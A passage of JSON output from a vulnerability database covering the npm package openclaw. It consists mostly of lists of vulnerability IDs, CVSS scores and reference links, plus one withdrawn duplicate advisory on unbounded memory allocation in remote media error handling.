"vulnerability":"VCID-294z-6z8j-97bx"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2hca-3v8f-f3e8"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2v8n-mnws-jfc9"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-32zs-2zs9-uufs"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-37ep-9smd-zuh9"},{"vulnerability":"VCID-384t-z1h8-pfft"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3bdd-a9nw-13bn"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4jwj-6s5z-wbeq"},{"vulnerability":"VCID-4nwq-14y4-xkhp"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4uqc-3h1c-4yhs"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-5atj-2a7b-57g5"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-6849-th74-yqd5"},{"vulnerability":"VCID-6bxd-kbse-sudx"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-8uzb-xmf8-hbca"},{"vulnerability":"VCID-8z7r-a8dv-eueb"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9jjv-aa8k-rke1"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9pj9-7b12-jbea"},{"vulnerability":"VCID-9uyu-y9qv-u7e1"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-9yxw-fj1c-tff9"},{"vulnerability":"VCID-a2p8-ydn6-3bbr"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-atn7-pn13-3fgb"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-aye6-1fwu-nkc5"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bg1d-gmxy-wkc6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bk76-1ctt-tkaw"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-bnfh-rsk9-cfea"},{"vulnerability":"VCID-brfj-4shr-qkgc"},{"vulnerability":"VCID-bumq-54sb-6ua7"},{"vulnerability":"VCID-bzw7-yvu2-yqa2"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-csnc-r6fv-j3en"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-cvxu-rdbu-abd2"},{"vulnerability":"VCID-cwd3-ecym-sfaw"},{"vulnerability":"VCID-d3qp-5wm9-aqfp"},{"vulnerability":"VCID-d864-qy75-c3dx"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dbcw-brhj-k7hs"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-djqx-bwuu-4uc1"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-gvam-2net-8kc5"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hkqd-6khg-m3hj"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-j92n-5217-9bhj"},{"vulnerability":"VCID-j96c-kau3-7fag"},{"vulnerability":"VCID-jbwa-scg3-efeq"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jhah-j2td-t3dp"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-jtxm-z4vv-cqg7"},{"vulnerability":"VCID-k3up-1vdf-2uh9"},{"vulnerability":"VCID-k52b-966p-ybbk"},{"vulnerability":"VCID-k5da-7tht-w3bs"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mggy-bv5s-5uax"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nfva-pukn-uqch"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pa1f-qzsh-efa9"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pc9z-x5wk-8ue7"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-qjvc-etb4-qbfv"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-r9y1-z2ax-z3e2"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-te8f-snty-j7hh"},{"vulnerability":"VCID-tf28-1z2z-5yfn"},{"vulnerability":"VCID-tk9h-nqrz-uugp"},{"vulnerability":"VCID-u1ru-vdfp-x3hu"},{"vulnerability":"VCID-u6hw-ffpj-4yd9"},{"vulnerability":"VCID-u9cw-crg5-1kbs"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v1bp-hw9a-yffz"},{"vulnerability":"VCID-v91b-1nmx-ckcx"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vfbb-bpy9-87ey"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vm8g-hrvu-quhm"},{"vulnerability":"VCID-vqrj-z6tx-rff2"},{"vulnerability":"VCID-vtqt-bgz7-yub6"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2rd-2j4p-gfgw"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wkye-je9r-1fba"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wut7-y72y-9ucb"},{"vulnerability":"VCID-wx44-n3fr-skah"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xpr3-hg3h-z3bz"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zac2-wjyt-27af"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zf3q-78js-k7ce"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.22"}],"aliases":["GHSA-p6j4-wvmc-vx2h"],"risk_score":3.3,"exploitability":"0.5","weighted_severity":"6.6","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-rf6b-q7cj-jbgc"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/89057?format=json","vulnerability_id":"VCID-rkx2-eq2x-q7d1","summary":"Duplicate Advisory: OpenClaw: Remote media error responses could trigger unbounded memory allocation before failure\n### Duplicate Advisory\nThis advisory has been withdrawn because it is a duplicate of GHSA-4qwc-c7g9-4xcw. This link is maintained to preserve external references.\n\n### Original Description\nOpenClaw before 2026.3.22 contains an unbounded memory allocation vulnerability in remote media HTTP error handling that allows attackers to trigger excessive memory consumption. Attackers can send crafted HTTP error responses with large bodies to remote media endpoints, causing the application to allocate unbounded memory before failure handling occurs.","references":[{"reference_url":"https://github.com/openclaw/openclaw/commit/630f1479c44f78484dfa21bb407cbe6f171dac87","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/commit/630f1479c44f78484dfa21bb407cbe6f171dac87"},{"reference_url":"https://github.com/openclaw/openclaw/commit/81445a901091a5d27ef0b56fceedbe4724566438","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/commit/81445a901091a5d27ef0b56fceedbe4724566438"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-4qwc-c7g9-4xcw","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-4qwc-c7g9-4xcw"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35633","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35633"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-unbounded-memory-allocation-via-remote-media-error-responses","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://www.vulncheck.com/advisories/openclaw-unbounded-memory-allocation-via-remote-media-error-responses"},{"reference_url":"https://github.com/advisories/GHSA-hm63-vwj4-mj2q","reference_id":"GHSA-hm63-vwj4-mj2q","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-hm63-vwj4-mj2q"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109983?format=json","purl":"pkg:npm/openclaw@2026.3.22","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1p3b-pfnn-x7ad"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-1smq-mbty-jkaj"},{"vulnerability":"VCID-24m7-jx1g-hqde"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-26sv-grsd-abcw"},{"vulnerability":"VCID-294z-6z8j-97bx"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2hca-3v8f-f3e8"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2v8n-mnws-jfc9"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-32zs-2zs9-uufs"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-37ep-9smd-zuh9"},{"vulnerability":"VCID-384t-z1h8-pfft"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3bdd-a9nw-13bn"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4jwj-6s5z-wbeq"},{"vulnerability":"VCID-4nwq-14y4-xkhp"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4uqc-3h1c-4yhs"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-5atj-2a7b-57g5"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-6849-th74-yqd5"},{"vulnerability":"VCID-6bxd-kbse-sudx"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-8uzb-xmf8-hbca"},{"vulnerability":"VCID-8z7r-a8dv-eueb"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9jjv-aa8k-rke1"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9pj9-7b12-jbea"},{"vulnerability":"VCID-9uyu-y9qv-u7e1"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-9yxw-fj1c-tff9"},{"vulnerability":"VCID-a2p8-ydn6-3bbr"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-atn7-pn13-3fgb"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-aye6-1fwu-nkc5"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bg1d-gmxy-wkc6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bk76-1ctt-tkaw"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-bnfh-rsk9-cfea"},{"vulnerability":"VCID-brfj-4shr-qkgc"},{"vulnerability":"VCID-bumq-54sb-6ua7"},{"vulnerability":"VCID-bzw7-yvu2-yqa2"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-csnc-r6fv-j3en"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-cvxu-rdbu-abd2"},{"vulnerability":"VCID-cwd3-ecym-sfaw"},{"vulnerability":"VCID-d3qp-5wm9-aqfp"},{"vulnerability":"VCID-d864-qy75-c3dx"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dbcw-brhj-k7hs"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-djqx-bwuu-4uc1"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-gvam-2net-8kc5"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hkqd-6khg-m3hj"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-j92n-5217-9bhj"},{"vulnerability":"VCID-j96c-kau3-7fag"},{"vulnerability":"VCID-jbwa-scg3-efeq"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jhah-j2td-t3dp"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-jtxm-z4vv-cqg7"},{"vulnerability":"VCID-k3up-1vdf-2uh9"},{"vulnerability":"VCID-k52b-966p-ybbk"},{"vulnerability":"VCID-k5da-7tht-w3bs"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mggy-bv5s-5uax"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nfva-pukn-uqch"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pa1f-qzsh-efa9"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pc9z-x5wk-8ue7"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-qjvc-etb4-qbfv"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-r9y1-z2ax-z3e2"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-te8f-snty-j7hh"},{"vulnerability":"VCID-tf28-1z2z-5yfn"},{"vulnerability":"VCID-tk9h-nqrz-uugp"},{"vulnerability":"VCID-u1ru-vdfp-x3hu"},{"vulnerability":"VCID-u6hw-ffpj-4yd9"},{"vulnerability":"VCID-u9cw-crg5-1kbs"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v1bp-hw9a-yffz"},{"vulnerability":"VCID-v91b-1nmx-ckcx"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vfbb-bpy9-87ey"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vm8g-hrvu-quhm"},{"vulnerability":"VCID-vqrj-z6tx-rff2"},{"vulnerability":"VCID-vtqt-bgz7-yub6"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2rd-2j4p-gfgw"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wkye-je9r-1fba"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wut7-y72y-9ucb"},{"vulnerability":"VCID-wx44-n3fr-skah"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xpr3-hg3h-z3bz"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zac2-wjyt-27af"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zf3q-78js-k7ce"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.22"}],"aliases":["GHSA-hm63-vwj4-mj2q"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-rkx2-eq2x-q7d1"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/89604?format=json","vulnerability_id":"VCID-rr6t-1193-ybgz","summary":"OpenClaw: 